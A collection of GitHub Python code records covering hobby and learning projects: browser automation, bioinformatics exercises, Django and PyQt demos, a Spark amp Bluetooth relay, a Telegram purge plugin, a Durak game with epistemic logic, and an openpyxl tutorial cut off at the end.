+{"seq_id":"26511350395","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\n\n\ndef play_video(title):\n    title = title.replace(\" \", \"+\")\n    chrome_driver_name = 'chromedriver'\n    project_root = os.getcwd()\n    driver_bin = os.path.join(project_root, chrome_driver_name)\n\n    driver = webdriver.Chrome(executable_path=driver_bin)\n    # driver = webdriver.Chrome()\n    driver.maximize_window()\n\n    wait = WebDriverWait(driver, 3)\n    presence = EC.presence_of_element_located\n    visible = EC.visibility_of_element_located\n\n    # Navigate to url with video being appended to search_query\n    driver.get(\"https://www.youtube.com/results?search_query=\" + title)\n\n    # play the video\n    wait.until(visible((By.ID, \"video-title\")))\n    driver.find_element_by_id(\"video-title\").click()\n\n    wait.until(visible((By.ID, \"info\")))\n    info = driver.find_element_by_id(\"info\")\n    info.send_keys('f')\n\n\nplay_video(\"the box\")\n","repo_name":"jhsu2/AlexaX","sub_path":"deez.py","file_name":"deez.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41569203672","text":"def CountingDNANucleotides(input_file):\r\n    with open(input_file,\"r\") as input:\r\n        DNA = input.read()\r\n        Count_of_A = DNA.lower().count('a')\r\n        Count_of_C = DNA.lower().count('c')\r\n        Count_of_G = DNA.lower().count('g')\r\n        Count_of_T = DNA.lower().count('t')\r\n    return Count_of_A, Count_of_C , Count_of_G, Count_of_T\r\n\r\ninput_file_path = r'D:\\Personal\\Academics\\UTA\\3rd semester\\Bioinformatics\\Rosalind\\Q6\\rosalind_dna.txt'\r\ncounts = CountingDNANucleotides(input_file_path)\r\nprint(*counts)\r\n\r\n","repo_name":"NDK22/Bioinformatic","sub_path":"Rosalind/Q6/Counting DNA Nucleotides.py","file_name":"Counting DNA Nucleotides.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"6591066493","text":"def 
digits(s):\n    power=len(str(s))\n    return power\nn=int(input(\"enter the number\"))\nsum1=0\ntemp=n\nif n<=100000:\n    while temp!=0:\n        r=temp%10\n        r1=r**digits(n)\n        sum1=sum1+r1\n        temp=temp//10\n    if(n==sum1):\n        print(\"yes\")\n    else:\n        print(\"no\")\n    \n    \n\n    \n\n    \n    \n","repo_name":"Sariga6/sariga","sub_path":"armstrong.py","file_name":"armstrong.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72855387393","text":"from django.utils import simplejson\nfrom dajaxice.decorators import dajaxice_register\nfrom Principal.models import *\nfrom django.core import serializers\nimport json\n\n\n@dajaxice_register\ndef get_locals(request):\n    objetos= Local.objects.all().values_list('nombre', 'lan', 'lot', 'descripcion', 'direccion', 'tipoLocal')\n    data=[]\n    for local in objetos:\n        data.append(local)\n    return json.dumps(data)\n\n@dajaxice_register\ndef get_locals_filter(request, tipoLocal):\n    if tipoLocal=='Todos':\n        objetos= Local.objects.all().values_list('nombre', 'lan', 'lot', 'descripcion', 'direccion', 'tipoLocal')\n    else:\n        objetos=Local.objects.filter(tipoLocal=tipoLocal).values_list('nombre', 'lan', 'lot', 'descripcion', 'direccion', 'tipoLocal')\n\n    data = []\n    for local in objetos:\n        data.append(local)\n    return json.dumps(data)","repo_name":"camilortte/Recomendador","sub_path":"Principal/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44103770156","text":"#! /usr/bin/python\n# -*- coding:UTF-8 -*-\nimport sys\nfrom PyQt5.QtWidgets import (QWidget,QHBoxLayout,QLabel,QApplication)\nfrom PyQt5.QtGui import QPixmap\nclass Example(QWidget):\n\tdef __init__(self):\n\t\tsuper(Example,self).__init__()\n\t\tself.initUI()\n\tdef initUI(self):\n\t\t\n\t\thbox = QHBoxLayout(self)\n\t\tpixmap = QPixmap('redrock.png')\n\n\t\tlb1 = QLabel(self)\n\t\tlb1.setPixmap(pixmap)\n\n\t\thbox.addWidget(lb1)\n\t\tself.move(300,200)\n\t\tself.setWindowTitle('Red Rock')\n\t\t#self.move(300,150)\n\t\tself.show()\n\t \n\t\n\t\t\t\n \nif __name__== '__main__':\n\tapp = QApplication(sys.argv)\n\tex = Example()\n\tsys.exit(app.exec_())","repo_name":"zuoshoupai/code","sub_path":"PyQt5 Demo/demo_map.py","file_name":"demo_map.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9161079041","text":"# now this uses the keyboard module\n# python -m pip install keyboard\n\nimport keyboard\nimport time\nimport socket\nimport threading\nimport serial\nimport struct\nfrom SparkClass import *\n#import bluetooth\n\n\nBAUD = 1000000\n\n# Get from Serial and send to Spark\nclass ReceiverThread(threading.Thread):\n    def __init__(self, my_ser, my_sock):\n        threading.Thread.__init__(self)\n        self.SparkSocket = my_sock\n        self.AppSerial = my_ser\n        self.data = b''\n        \n    def run(self):\n        global stop_now\n        \n        while not stop_now:\n            self.data = self.data+self.AppSerial.read(400)\n            if self.data:\n                if self.data[0] != 1:\n                    self.data= self.data[1:]\n                elif self.data[-1] == 247: \n                    print (\">> %s >>\" % self.data.hex())\n                    cmd = self.data[20:22]\n                    if cmd.hex() == \"0201\":\n                        num = self.data[23:25]\n                        print(\"Skipping preset request: \",cmd.hex(), \" \", num.hex())\n                    else:\n                        self.SparkSocket.send(self.data)\n                    self.data=b''\n            \n        print(\"App -> Spark thread stopped\")\n\n\n# Get from Spark and send to serial \nclass 
SenderThread(threading.Thread):\n def __init__(self, my_ser, my_sock):\n threading.Thread.__init__(self)\n self.SparkSocket = my_sock\n self.AppSerial = my_ser\n self.data = b''\n \n def run(self):\n global stop_now\n \n s = self.SparkSocket.recv(1)\n while not stop_now:\n if s == b'\\x01':\n t = self.SparkSocket.recv(1)\n if t == b'\\xfe':\n self.data = s + t\n s = self.SparkSocket.recv(5)\n self.data = self.data + s\n leng = int(s[4])\n s = self.SparkSocket.recv(leng - 7)\n self.data += s\n print (\"<< %s <<\" % self.data.hex())\n self.AppSerial.write(self.data)\n else:\n s = t\n else:\n s = self.SparkSocket.recv(1)\n \n print(\"Spark -> App thread stopped\")\n \nclass IntercepterThread(threading.Thread):\n def __init__(self, my_ser, my_sock):\n threading.Thread.__init__(self)\n self.SparkSocket = my_sock\n self.AppSerial = my_ser\n self.data = b''\n self.sc = SparkMessage()\n \n def run(self):\n global stop_now\n \n while not stop_now:\n if keyboard.is_pressed('0'):\n pres = 0\n elif keyboard.is_pressed('1'):\n pres = 1\n elif keyboard.is_pressed('2'):\n pres = 2\n elif keyboard.is_pressed('3'):\n pres = 3\n else:\n pres = -1\n\n if keyboard.is_pressed('q'):\n stop_now = True\n \n if pres >=0: \n byts = self.sc.change_hardware_preset(pres)\n byts2 = byts[0][0:4] + b'\\x41\\xff' + byts[0][6:20]+b'\\x03'+byts[0][21:]\n\n print(\"Sending change to preset %d\" % pres)\n print(\"}} %s }}\" % byts[0].hex())\n \n self.SparkSocket.send(byts[0])\n\n print(\"{{ %s {{\" % byts2.hex())\n \n self.AppSerial.write(byts2)\n # now just wait a bit \n time.sleep(0.2)\n \n print(\"Inter thread stopped\")\n\ndef main():\n global stop_now\n stop_now = False\n \n sc = SparkMessage()\n pres = 0\n \n ser=serial.Serial(\"COM7\", BAUD, timeout=0)\n \n print (\"Connecting to Spark - 08:EB:ED:4E:47:07\")\n SERVER_PORT = 2\n# spark = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n spark = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)\n spark.connect((\"08:EB:ED:4E:47:07\", SERVER_PORT))\n print (\"Connected successfully\")\n\n sendThread = SenderThread(ser, spark)\n recvThread = ReceiverThread(ser, spark)\n interThread = IntercepterThread(ser, spark)\n \n sendThread.start()\n recvThread.start()\n interThread.start()\n \n sendThread.join()\n recvThread.join()\n interThread.join()\n\n print(\"Finished\")\n ser.close()\n spark.close()\n\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"paulhamsh/Spark-Intercepter","sub_path":"src/SparkSpoofer4.py","file_name":"SparkSpoofer4.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5611511128","text":"\"\"\"Purge Messages\nSyntax: .purge\"\"\"\n\nimport asyncio\nfrom datetime import datetime\n\nfrom pyrogram import Client, Filters\n\nfrom pyrobot import COMMAND_HAND_LER\n\n\n@Client.on_message(Filters.command(\"purge\", COMMAND_HAND_LER) & Filters.me)\nasync def purge(client, message):\n if message.reply_to_message:\n start_t = datetime.now()\n recvd_commands = message.text.split(\" \")\n from_user = None\n if len(recvd_commands) > 1:\n user_id = recvd_commands[1]\n from_user = await client.get_users(user_id)\n start_message = message.reply_to_message.message_id\n end_message = message.message_id\n list_of_messages = await client.get_messages(\n chat_id=message.chat.id,\n message_ids=range(start_message, end_message),\n replies=0\n )\n # print(list_of_messages)\n list_of_messages_to_delete = []\n purged_messages_count = 0\n for 
a_message in list_of_messages:\n            if len(list_of_messages_to_delete) == 100:\n                await client.delete_messages(\n                    chat_id=message.chat.id,\n                    message_ids=list_of_messages_to_delete,\n                    revoke=True\n                )\n                purged_messages_count += len(list_of_messages_to_delete)\n                list_of_messages_to_delete = []\n            if from_user is not None:\n                if a_message.from_user == from_user:\n                    list_of_messages_to_delete.append(a_message.message_id)\n            else:\n                list_of_messages_to_delete.append(a_message.message_id)\n        print(list_of_messages_to_delete)\n        await client.delete_messages(\n            chat_id=message.chat.id,\n            message_ids=list_of_messages_to_delete,\n            revoke=True\n        )\n        purged_messages_count += len(list_of_messages_to_delete)\n        list_of_messages_to_delete = []\n        end_t = datetime.now()\n        time_taken_s = (end_t - start_t).seconds\n        await message.edit(\n            f\"purged {purged_messages_count} messages in {time_taken_s} seconds.\"\n        )\n        await asyncio.sleep(5)\n        await message.delete()\n    else:\n        await message.edit(\"Reply to a message to purge [user's] messages.\")\n","repo_name":"dr4g0n18/-4","sub_path":"pyrobot/plugins/purge.py","file_name":"purge.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"45060791400","text":"from AttackField import AttackField\nfrom mesa import Model\nfrom CustomStagedActivation import CustomStagedActivation\nfrom Player import Player\nfrom Deck import Deck\nfrom DiscardPile import DiscardPile\nfrom KnowledgeFact import KnowledgeFact\nfrom Inference import Inference\nimport random\nfrom newKripke import *\n\n\nclass DurakModel(Model):\n    \"\"\"A model for the game of Durak with some number of players.\"\"\"\n\n    def __init__(\n        self,\n        multiple={},\n        num_players=2,\n        num_suits=2,\n        num_cards_per_suit=2,\n        num_starting_cards=1,\n        player_strategies=[\"normal\", \"normal\"],\n        player_depths=[1, 1],\n        verbose=True,\n        multiple_runs=False):\n        '''\n        Initialize the game\n        :param num_players: The number of players for this game\n        :param num_suits: The number of suits being played with\n        :param num_cards_per_suit: The number of cards per suit\n        :param num_starting_cards: The number of cards that each player starts with\n        '''\n\n        if multiple:\n            '''\n            When running multiple games, all this is passed from experiments.ipynb\n            This makes running games with the same settings significantly faster\n            '''\n            self.players = []\n            self.winners = []\n            self.durak = None\n            self.attack_fields = []\n\n            self.player_strategies = multiple[\"player_strategies\"]\n            self.player_depths = multiple[\"player_depths\"]\n            self.num_players = multiple[\"num_players\"]\n            self.num_suits = multiple[\"num_suits\"]\n            self.num_cards_per_suit = multiple[\"num_cards_per_suit\"]\n            self.num_starting_cards = multiple[\"num_starting_cards\"]\n            self.schedule = CustomStagedActivation(self)\n            self.verbose = verbose\n\n            for i in range(self.num_players):\n                # Create the attack fields\n                self.attack_fields.append(AttackField())\n\n            for i in range(self.num_players):\n                # Create the players\n                player = Player(i, self, self.attack_fields, self.num_players, self.player_strategies[i],\n                                self.player_depths[i])\n                self.players.append(player)\n                self.schedule.add(player)\n\n            for player in self.players:\n                # Set the order of play\n                player.set_next_player(self.players[(player.get_id() + 1) % self.num_players])\n                player.set_previous_player(self.players[(player.get_id() - 1) % self.num_players])\n\n            # Create the discard pile\n            self.discard_pile = DiscardPile()\n\n            # Create the deck and shuffle it\n            
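# (editor note, hedged) Deck and DiscardPile are external helpers; the rest of\n            # this file assumes Deck exposes .deal(), .is_empty(), .deck, .initial_deck and\n            # .trump_suit, and DiscardPile exposes .cards, .add_card() and .get_all_cards().\n            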
self.deck = Deck(num_suits, num_cards_per_suit)\n\n self.kripke_deck = []\n self.kripke_discard_pile = []\n self.kripke_players = []\n self.kripke_card_locations = []\n self.kripke_worlds = None\n self.kripke_model = None\n self.reachable_worlds = None\n\n else:\n '''\n Initialize all these values if we run a single game\n '''\n self.players = []\n self.player_strategies = player_strategies\n self.player_depths = player_depths\n self.winners = []\n self.durak = None\n self.attack_fields = []\n self.num_players = num_players\n self.num_suits = num_suits\n self.num_cards_per_suit = num_cards_per_suit\n self.num_starting_cards = num_starting_cards\n self.schedule = CustomStagedActivation(self)\n # self.inference_engine = Inference(verbose)\n self.verbose = verbose\n\n for i in range(self.num_players):\n # Create the attack fields\n self.attack_fields.append(AttackField())\n\n for i in range(self.num_players):\n # Create the players\n player = Player(i, self, self.attack_fields, self.num_players, self.player_strategies[i],\n self.player_depths[i])\n self.players.append(player)\n self.schedule.add(player)\n\n for player in self.players:\n # Set the order of play\n player.set_next_player(self.players[(player.get_id() + 1) % num_players])\n player.set_previous_player(self.players[(player.get_id() - 1) % num_players])\n\n # Create the discard pile\n self.discard_pile = DiscardPile()\n\n # Create the deck and shuffle it\n self.deck = Deck(num_suits, num_cards_per_suit)\n\n # Create the initial Kripke model with all players and all cards in the deck\n self.kripke_deck = [str(c) for c in self.deck.deck]\n self.kripke_discard_pile = [str(c) for c in self.discard_pile.cards]\n self.kripke_players = [str(p.get_id()) for p in self.players]\n self.kripke_card_locations = [\"Deck\", \"Discard\"]\n self.kripke_card_locations.extend(self.kripke_players)\n self.kripke_worlds = gen_worlds(self.kripke_deck, self.kripke_card_locations, self.kripke_players,\n self.num_starting_cards)\n self.kripke_model, self.reachable_worlds = gen_empty_kripke(self.kripke_worlds, self.kripke_players)\n\n '''\n This part of the initalization happens for every game, no matter how it was run. 
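\n\n        A minimal driving loop (editor sketch, mirroring play() at the bottom of this file):\n\n            m = DurakModel(num_players=2)\n            while not m.durak:\n                m.step()\n            game_data = m.get_game_data()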
\n '''\n # Deal\n for i in range(self.num_starting_cards):\n for player in self.players:\n player.receive_card(self.deck.deal())\n\n # Select a random starting attacker and set the defender\n self.current_attacker = random.choice(self.players)\n self.current_defender = self.current_attacker.get_next_player()\n\n # Add the starting card knowledge to the Kripke model\n for player in self.players:\n print(\"Updating model at start of game\")\n kripke_player = str(player.get_id())\n statement = make_statement_cards(self.deck.initial_deck, [kripke_player + str(c) for c in player.hand.get_cards_in_hand()], kripke_player,\n True, len(self.deck.deck), len(self.discard_pile.cards))\n # print(\"\\t Statement:\", statement)\n # print(\"cards are\", player.hand.get_cards_in_hand())\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n\n def __repr__(self):\n '''\n Returns the representation of the entire model at the current state.\n '''\n return \"---------STATE----------\\n\" \\\n + \"Deck: \" + str(self.deck) \\\n + \"\\nTrump suit: \" + self.deck.trump_suit \\\n + \"\\n\\nWinners: \" + str(self.winners) \\\n + \"\\n\\nPlayers: \" + str(self.players) \\\n + \"\\n\\nAttack fields: \" + str(self.attack_fields) \\\n + \"\\n\\nDiscard pile: \" + str(self.discard_pile) \\\n + \"\\n------------------------\"\n\n def step(self):\n '''\n Advance the model by one step. In each step, the following happens:\n 1. The current attacking player attacks\n 2. The players update their knowledge.\n 3. The current defending player defends.\n 4. The attack is resolved and a winner is determined or the next attacker is chosen.\n 5. The players update their knowledge.\n '''\n self.schedule.step(self, self.current_attacker, self.current_defender)\n\n def add_common_knowledge(self, card,\n position): # position is \"deck\", \"attack\", \"defend\", or \"discard\" (maybe players as well?)\n self.common_knowledge.append(KnowledgeFact(\"C\", \"\", card, position))\n\n def add_common_knowledge_num(self, num, position): # every player knows how many cards are where\n self.common_knowledge.append(KnowledgeFact(\"C\", \"\", num, position))\n\n def remove_old_hand_num_knowledge(self, knowledge):\n to_remove = []\n for fact in knowledge:\n if type(fact.card) == int: # BAD! 
REFACTOR!\n to_remove.append(fact)\n return to_remove\n\n def resolve_discard_pile(self):\n pass\n\n def return_winning_card(self, card1, card2):\n '''\n Compares two cards and returns the highest card or a tie\n '''\n value1 = self.deck.values.index(card1.get_value())\n suit1_trump = card1.get_suit() == self.deck.get_trump_suit()\n value2 = self.deck.values.index(card2.get_value())\n suit2_trump = card2.get_suit() == self.deck.get_trump_suit()\n\n if suit1_trump:\n if suit2_trump:\n if value1 > value2:\n return card1\n else:\n return card2\n else:\n return card1\n else:\n if suit2_trump:\n return card2\n else:\n if value1 > value2:\n return card1\n elif value1 < value2:\n return card2\n else:\n return \"tie\"\n\n def resolve_attack(self, attacker, defender):\n '''\n Resolve the attack from the given attacker.\n\n :param attacker: The attacker in the attack\n\n Returns the Durak if there is one, else None\n '''\n field = attacker.get_attack_field()\n attack_cards = field.get_attacking_cards()\n defence_cards = field.get_defending_cards()\n attacker_wins = False\n to_remove = []\n\n # The attacker wins if the defender cannot place enough cards or if they defeat one of the defender's cards\n if len(attack_cards) > len(defence_cards):\n attacker_wins = True\n elif len(attack_cards) < len(defence_cards):\n print(\"ERROR: Defender placed more cards than attacker.\")\n else:\n for i, attack_card in enumerate(attack_cards):\n if self.return_winning_card(attack_card, defence_cards[i]) == attack_card:\n attacker_wins = True\n\n # Resolving of the attack if the attacker wins\n if attacker_wins:\n if self.verbose:\n print(\"Player \" + str(attacker.get_id()) + \" won! The cards go to player \" + str(defender.get_id()))\n print(\"------------------------\")\n # Defender gets the cards if attacker wins\n for attack_card in attack_cards:\n defender.receive_card(attack_card)\n for defend_card in defence_cards:\n defender.receive_card(defend_card)\n\n # Update the knowledge of all players\n for player in self.players:\n kripke_player = str(player.get_id())\n kripke_defender = str(defender.get_id())\n kripke_attacker = str(attacker.get_id())\n kripke_attack_card = str(attack_card)\n kripke_defence_card = str(defend_card)\n\n # known_cards_attacker = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_attacker))\n # known_cards_attacker.remove(kripke_attacker + kripke_attack_card)\n # statement = make_statement_cards(self.deck.initial_deck, known_cards_list, kripke_player,\n # len(self.deck.deck), len(self.discard_pile.cards))\n #\n # self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n # statement, self.reachable_worlds)\n # self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n # statement, self.reachable_worlds)\n print(\"Updating model after unsuccessful defense\")\n # known_cards_defender = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_defender))\n known_cards_defender = list(knowledge_base(player, self.reachable_worlds))\n known_cards_defender.append(kripke_defender + kripke_defence_card)\n known_cards_defender.append(kripke_defender + kripke_attack_card)\n # print(\"YOEEEEEEEEEEEEEEEEEEEHOEEEEEEEEEEEEEEEEEEEEEEE\", known_cards_defender)\n statement = make_statement_cards(self.deck.initial_deck, known_cards_defender, kripke_defender,\n False, len(self.deck.deck), len(self.discard_pile.cards))\n statement = And(statement, Not(Atom(kripke_attacker + kripke_attack_card)))\n # print(\"\\t 
Statement:\", statement)\n\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n print(\"------------------------\")\n\n # Resolving of the attack if the defender wins\n else:\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" won! The cards go to the discard pile!\")\n print(\"------------------------\")\n # Discard pile gets the cards otherwise\n for attack_card in attack_cards:\n self.discard_pile.add_card(attack_card)\n for defend_card in defence_cards:\n self.discard_pile.add_card(defend_card)\n\n # Update the knowledge of all players\n # --> REMOVE relations to all worlds where the discard pile does not have those cards\n for player in self.players:\n kripke_player = str(player.get_id())\n kripke_attacker = str(attacker.get_id())\n kripke_defender = str(defender.get_id())\n kripke_discard_pile = \"Discard\"\n kripke_attack_card = str(attack_card)\n kripke_defence_card = str(defend_card)\n\n # known_cards_attacker = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_attacker))\n # print(\"testing...\")\n # if (kripke_attacker + kripke_attack_card) in known_cards_attacker:\n # known_cards_attacker.remove(kripke_attacker + kripke_attack_card)\n # statement = make_statement_cards(self.deck.initial_deck, known_cards_attacker, kripke_player,\n # len(self.deck.deck), len(self.discard_pile.cards))\n #\n # self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n # statement, self.reachable_worlds)\n # self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n # statement, self.reachable_worlds)\n\n print(\"Updating model after successful defense\")\n\n # known_cards_discard = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_discard_pile))\n known_cards_discard = list(knowledge_base(player, self.reachable_worlds))\n # print(\"known cards on discard pile:\", known_cards_discard)\n known_cards_discard.append(kripke_discard_pile + kripke_defence_card)\n known_cards_discard.append(kripke_discard_pile + kripke_attack_card)\n # print(\"\\t\\t\\t now We know: \", known_cards_discard)\n statement = make_statement_cards(self.deck.initial_deck, known_cards_discard, kripke_discard_pile,\n False, len(self.deck.deck), len(self.discard_pile.get_all_cards()))\n\n\n # statement.append(Not(Atom(kripke_attacker + kripke_attack_card)))\n statement = And(statement, Not(Atom(kripke_attacker + kripke_attack_card)))\n statement = And(statement, Not(Atom(kripke_defender + kripke_defence_card)))\n # print(\"\\t Statement:\", statement)\n\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n # print(\"\\t\\t\\t AFTER UPDATING\")\n # now_known = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_discard_pile))\n\n # self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n # Atom(kripke_discard_pile + kripke_attack_card),\n # self.reachable_worlds)\n # self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n # Atom(kripke_discard_pile + kripke_defence_card),\n # self.reachable_worlds)\n # self.kripke_model, 
self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n # Atom(kripke_discard_pile + kripke_attack_card),\n # self.reachable_worlds)\n # self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n # Atom(kripke_discard_pile + kripke_defence_card),\n # self.reachable_worlds)\n print(\"------------------------\")\n\n # If the deck is empty, no cards can be taken: check if there are winners\n if self.deck.is_empty():\n # Check if the attacking player has won the game\n if attacker.hand.is_empty():\n\n # Make the attack fields match the new situation\n defender.set_defence_field(attacker.get_defence_field())\n\n # Make the turns match the new situation\n attacker.get_previous_player().set_next_player(defender)\n defender.set_previous_player(attacker.get_previous_player())\n\n if self.verbose:\n print(\"Player \" + str(attacker.get_id()) + \" has won the game!!\")\n self.winners.append(attacker)\n self.players.remove(attacker)\n\n # Check if the game is over\n if len(self.players) == 1:\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" has lost the game and is now the DURAK!!\")\n return defender\n\n # Check if the defending player has won the game\n if defender.hand.is_empty():\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" has won the game!!\")\n\n # Make the attack fields match the new situation\n attacker.set_attack_field(defender.get_attack_field())\n\n # Make the turns match the new situation\n attacker.set_next_player(defender.get_next_player())\n defender.get_next_player().set_previous_player(attacker)\n\n self.winners.append(defender)\n self.players.remove(defender)\n\n # Check if the game is over\n if len(self.players) == 1:\n if attacker in self.winners:\n return defender.get_next_player()\n else:\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" has lost the game and is now the DURAK!!\")\n return attacker\n\n # The deck is not empty\n else:\n # Take cards if needed\n num_cards_attacker = len(attacker.hand.get_cards_in_hand())\n num_cards_defender = len(defender.hand.get_cards_in_hand())\n if num_cards_attacker < self.num_starting_cards:\n attacker.take_cards_from_deck(self, self.num_starting_cards - num_cards_attacker)\n\n # Update the knowledge of attacker\n kripke_player = str(attacker.get_id())\n print(\"Updating model after attacker draws\")\n statement = make_statement_cards(self.deck.initial_deck, [kripke_player + str(c) for c in attacker.hand.get_cards_in_hand()],\n kripke_player, False, len(self.deck.deck), len(self.discard_pile.cards))\n\n # print(\"\\t Statement:\", statement)\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n\n # After the attacker has taken enough cards, check if the deck is now empty and the defender has won\n if self.deck.is_empty():\n if defender.hand.is_empty():\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" has won the game!!\")\n\n # Make the attack fields match the new situation\n attacker.set_attack_field(defender.get_attack_field())\n\n # Make the turns match the new situation\n attacker.set_next_player(defender.get_next_player())\n defender.get_next_player().set_previous_player(attacker)\n\n self.winners.append(defender)\n self.players.remove(defender)\n\n # Check if the game is over\n if len(self.players) == 1:\n 
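# only the attacker is left in the game, so the attacker is the durak (loser)\n                            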
return attacker\n\n if num_cards_defender < self.num_starting_cards:\n defender.take_cards_from_deck(self, self.num_starting_cards - num_cards_defender)\n # Update the knowledge of defender\n print(\"Updating knowledge after defender draws\")\n kripke_player = str(defender.get_id())\n statement = make_statement_cards(self.deck.initial_deck, [kripke_player + str(c) for c in defender.hand.get_cards_in_hand()],\n kripke_player, False, len(self.deck.deck), len(self.discard_pile.cards))\n # print(\"\\t Statement:\", statement)\n\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n\n # Determine who's turn it is now\n if attacker_wins:\n self.current_attacker = defender.get_next_player()\n self.current_defender = defender.get_next_player().get_next_player()\n if self.verbose:\n print(\"It is now player \" + str(self.current_attacker.get_id()) + \"'s turn\")\n else:\n if defender.hand.is_empty():\n self.current_attacker = defender.get_next_player()\n self.current_defender = defender.get_next_player().get_next_player()\n else:\n self.current_attacker = defender\n self.current_defender = defender.get_next_player()\n if self.verbose:\n print(\"It is now player \" + str(self.current_attacker.get_id()) + \"'s turn\")\n\n # Clear the attack field\n field.clear()\n\n # Return None if there is no Durak yet\n return None\n\n def test(self):\n print(\"GAME STATE\")\n print(self.players)\n\n for player in self.players:\n print(player.hand.get_cards_in_hand())\n\n print(\"END GAME STATE\")\n\n def set_durak(self, durak):\n '''\n Sets the Durak.\n '''\n self.durak = durak\n\n def get_game_data(self):\n '''\n Returns the current state of the game.\n '''\n game_state = {\n \"num_players\": self.num_players,\n \"num_suits\": self.num_suits,\n \"num_cards_per_suit\": self.num_cards_per_suit,\n \"num_starting_cards\": self.num_starting_cards,\n \"durak\": self.durak.get_id(),\n \"winners\": [winner.get_id() for winner in self.winners],\n \"player_strategies\": self.player_strategies,\n \"player_depths\": self.player_depths\n }\n\n return game_state\n\n\ndef play(m):\n '''\n Play a game of Durak until there is a winner\n\n :param m: The model to play the game with\n '''\n\n while not m.durak:\n print(m)\n m.step()\n print(m)\n\n return m.get_game_data()\n\n\nm = DurakModel(verbose=True)\n# print(\"Starting state...\")\n# print(m)\n# print(\"Play! 
\")\nplay(m)\n","repo_name":"BorisWinter/durak","sub_path":"durak.py","file_name":"durak.py","file_ext":"py","file_size_in_byte":26094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19986295461","text":"import openpyxl\nfrom openpyxl import load_workbook\n#to start the excel or load the excel\nbook = load_workbook(\"C:\\\\Users\\\\Lokesh\\\\Desktop\\\\Python\\\\pythonProject1\\\\excelDemo.xlsx\")\n#to get the active sheet\nsheet= book.active\n#to get the access to the sheet and print first row and column value\ncell= sheet.cell(row=1,column=1)\n#to print the value\nprint(cell.value)\n\n#to write the value\nsheet.cell(row=2, column=2).value=\"LokeshKoli\"\nprint(sheet.cell(row=2, column=2).value)\n\n#to get total row count\nprint(sheet.max_row)\n\n#to get total coluum count\nprint(sheet.max_column)\n\n#to print all the first row value\nfor row in range(1,sheet.max_row+1):\n print(sheet.cell(row=row,column=1).value)\n\n# to print all the excel value\nprint(\"All the value\")\nfor row in range(1,sheet.max_row+1):\n for col in range(1,sheet.max_column+1):\n\n print(sheet.cell(row=row, column=col).value)\n\nprint(\"second row value\")\n# to get value for specifc row\nfor row in range(1, sheet.max_row+1):\n if sheet.cell(row=row, column=1).value==\"Testcase2\":\n for col in range(2, sheet.max_column+1):\n print(sheet.cell(row=row, column=col).value)\n\nprint(\"pass in dictonary\")\nDict={}\n\nfor row in range(1, sheet.max_row+1):\n if sheet.cell(row=row, column=1).value == \"Testcase2\":\n for col in range(1, sheet.max_column+1):\n Dict[sheet.cell(row=1, column=col).value] = sheet.cell(row=row, 